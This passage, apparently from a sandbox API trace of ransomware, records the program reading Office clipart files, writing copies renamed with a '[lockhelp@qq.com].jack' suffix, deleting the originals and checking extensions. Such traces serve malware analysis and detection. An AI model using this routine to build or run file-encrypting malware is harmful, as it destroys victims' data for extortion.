(hObject=0x424) returned 1 [0210.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif")) returned 0x220 [0210.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0210.816] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.816] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0210.816] GetLastError () returned 0x0 [0210.816] ReadFile (in: hFile=0x424, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x47a, lpOverlapped=0x0) returned 1 [0211.192] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x480, lpOverlapped=0x0) returned 1 [0211.193] ReadFile (in: hFile=0x424, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0211.193] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xec, lpOverlapped=0x0) returned 1 [0211.193] SetEndOfFile (hFile=0x418) returned 1 [0211.194] CloseHandle (hObject=0x418) returned 1 [0211.196] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0211.196] SetEndOfFile (hFile=0x424) returned 1 [0211.197] CloseHandle (hObject=0x424) returned 1 [0211.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0211.197] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0211.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.198] lstrlenW (lpString=".doc") returned 4 [0211.198] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0211.198] lstrlenW (lpString=".docx") returned 5 [0211.198] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0211.198] lstrlenW (lpString=".pdf") returned 4 [0211.198] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0211.198] lstrlenW (lpString=".xls") returned 4 [0211.198] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0211.198] lstrlenW (lpString=".xlsx") returned 5 [0211.198] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0211.198] lstrlenW (lpString=".ppt") returned 4 [0211.198] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0211.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.198] lstrlenW (lpString=".zip") returned 4 [0211.198] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0211.198] lstrlenW (lpString=".rar") returned 4 [0211.198] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0211.198] lstrlenW (lpString=".bz2") returned 4 [0211.198] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0211.198] lstrlenW (lpString=".7z") returned 3 [0211.198] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0211.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.198] lstrlenW (lpString=".dbf") returned 4 [0211.198] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0211.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.198] lstrlenW (lpString=".1cd") returned 4 [0211.198] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0211.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.199] lstrlenW (lpString=".jpg") returned 4 [0211.199] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0211.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.199] lstrlenW (lpString=".doc") returned 4 [0211.199] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0211.199] lstrlenW (lpString=".docx") returned 5 [0211.199] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0211.199] lstrlenW (lpString=".pdf") returned 4 [0211.199] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0211.199] lstrlenW (lpString=".xls") returned 4 [0211.199] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0211.199] lstrlenW (lpString=".xlsx") returned 5 [0211.199] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0211.199] lstrlenW (lpString=".ppt") returned 4 [0211.199] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0211.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.199] lstrlenW (lpString=".zip") returned 4 [0211.199] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0211.199] lstrlenW (lpString=".rar") returned 4 [0211.199] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0211.199] lstrlenW (lpString=".bz2") returned 4 [0211.199] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0211.199] lstrlenW (lpString=".7z") returned 3 [0211.199] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0211.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.199] lstrlenW (lpString=".dbf") returned 4 [0211.199] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0211.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.199] lstrlenW (lpString=".1cd") returned 4 [0211.199] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0211.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 68 [0211.199] lstrlenW (lpString=".jpg") returned 4 [0211.199] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0211.200] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0211.200] lstrlenW (lpString="AG00164_.GIF") returned 12 [0211.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0211.200] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=13254) returned 1 [0211.200] CloseHandle (hObject=0x424) returned 1 [0211.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif")) returned 0x220 [0211.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0211.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0211.200] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0211.200] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0211.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0211.201] GetLastError () returned 0x0 [0211.201] ReadFile (in: hFile=0x424, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x33c6, lpOverlapped=0x0) returned 1 [0214.953] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x33d0, lpOverlapped=0x0) returned 1 [0214.954] ReadFile (in: hFile=0x424, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0214.954] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xec, lpOverlapped=0x0) returned 1 [0214.954] SetEndOfFile (hFile=0x418) returned 1 [0215.229] CloseHandle (hObject=0x418) returned 1 [0215.230] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.230] SetEndOfFile (hFile=0x424) returned 1 [0215.231] CloseHandle (hObject=0x424) returned 1 [0215.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0215.231] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0215.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.232] lstrlenW (lpString=".doc") returned 4 [0215.232] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.232] lstrlenW (lpString=".docx") returned 5 [0215.232] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.232] lstrlenW (lpString=".pdf") returned 4 [0215.232] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.232] lstrlenW (lpString=".xls") returned 4 [0215.232] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.232] lstrlenW (lpString=".xlsx") returned 5 [0215.232] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.232] lstrlenW (lpString=".ppt") returned 4 [0215.232] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.232] lstrlenW (lpString=".zip") returned 4 [0215.232] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.232] lstrlenW (lpString=".rar") returned 4 [0215.232] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.232] lstrlenW (lpString=".bz2") returned 4 [0215.232] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.232] lstrlenW (lpString=".7z") returned 3 [0215.233] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.233] lstrlenW (lpString=".dbf") returned 4 [0215.233] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.233] lstrlenW (lpString=".1cd") returned 4 [0215.233] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.233] lstrlenW (lpString=".jpg") returned 4 [0215.233] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.233] lstrlenW (lpString=".doc") returned 4 [0215.233] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.233] lstrlenW (lpString=".docx") returned 5 [0215.233] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.233] lstrlenW (lpString=".pdf") returned 4 [0215.233] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.233] lstrlenW (lpString=".xls") returned 4 [0215.233] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.233] lstrlenW (lpString=".xlsx") returned 5 [0215.233] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.233] lstrlenW (lpString=".ppt") returned 4 [0215.233] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.233] lstrlenW (lpString=".zip") returned 4 [0215.233] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.234] lstrlenW (lpString=".rar") returned 4 [0215.234] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.234] lstrlenW (lpString=".bz2") returned 4 [0215.234] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.234] lstrlenW (lpString=".7z") returned 3 [0215.234] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.234] lstrlenW (lpString=".dbf") returned 4 [0215.234] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.234] lstrlenW (lpString=".1cd") returned 4 [0215.234] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 68 [0215.234] lstrlenW (lpString=".jpg") returned 4 [0215.234] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.234] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0215.234] lstrlenW (lpString="AG00172_.GIF") returned 12 [0215.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0215.235] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=4390) returned 1 [0215.235] CloseHandle (hObject=0x424) returned 1 [0215.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif")) returned 0x220 [0215.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0215.235] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.235] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0215.236] GetLastError () returned 0x0 [0215.236] ReadFile (in: hFile=0x424, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x1126, lpOverlapped=0x0) returned 1 [0215.310] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x1130, lpOverlapped=0x0) returned 1 [0215.311] ReadFile (in: hFile=0x424, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.311] WriteFile (in: hFile=0x418, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xec, lpOverlapped=0x0) returned 1 [0215.311] SetEndOfFile (hFile=0x418) returned 1 [0215.358] CloseHandle (hObject=0x418) returned 1 [0215.359] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.359] SetEndOfFile (hFile=0x424) returned 1 [0215.360] CloseHandle (hObject=0x424) returned 1 [0215.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0215.360] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif")) returned 1 [0215.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.361] lstrlenW (lpString=".doc") returned 4 [0215.361] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.361] lstrlenW (lpString=".docx") returned 5 [0215.361] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.361] lstrlenW (lpString=".pdf") returned 4 [0215.361] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.361] lstrlenW (lpString=".xls") returned 4 [0215.361] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.361] lstrlenW (lpString=".xlsx") returned 5 [0215.361] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.361] lstrlenW (lpString=".ppt") returned 4 [0215.361] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.361] lstrlenW (lpString=".zip") returned 4 [0215.361] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.361] lstrlenW (lpString=".rar") returned 4 [0215.361] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.361] lstrlenW (lpString=".bz2") returned 4 [0215.361] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.361] lstrlenW (lpString=".7z") returned 3 [0215.361] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.361] lstrlenW (lpString=".dbf") returned 4 [0215.361] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.361] lstrlenW (lpString=".1cd") returned 4 [0215.361] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.361] lstrlenW (lpString=".jpg") returned 4 [0215.361] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.362] lstrlenW (lpString=".doc") returned 4 [0215.362] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.362] lstrlenW (lpString=".docx") returned 5 [0215.362] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.362] lstrlenW (lpString=".pdf") returned 4 [0215.362] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.362] lstrlenW (lpString=".xls") returned 4 [0215.362] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.362] lstrlenW (lpString=".xlsx") returned 5 [0215.362] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.362] lstrlenW (lpString=".ppt") returned 4 [0215.362] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.362] lstrlenW (lpString=".zip") returned 4 [0215.362] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.362] lstrlenW (lpString=".rar") returned 4 [0215.362] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.362] lstrlenW (lpString=".bz2") returned 4 [0215.362] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.362] lstrlenW (lpString=".7z") returned 3 [0215.362] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.362] lstrlenW (lpString=".dbf") returned 4 [0215.362] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.362] lstrlenW (lpString=".1cd") returned 4 [0215.362] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 68 [0215.362] lstrlenW (lpString=".jpg") returned 4 [0215.362] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.362] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0215.362] lstrlenW (lpString="AG00175_.GIF") returned 12 [0215.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0219.553] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=3378) returned 1 [0219.553] CloseHandle (hObject=0x3ec) returned 1 [0219.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif")) returned 0x220 [0219.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft 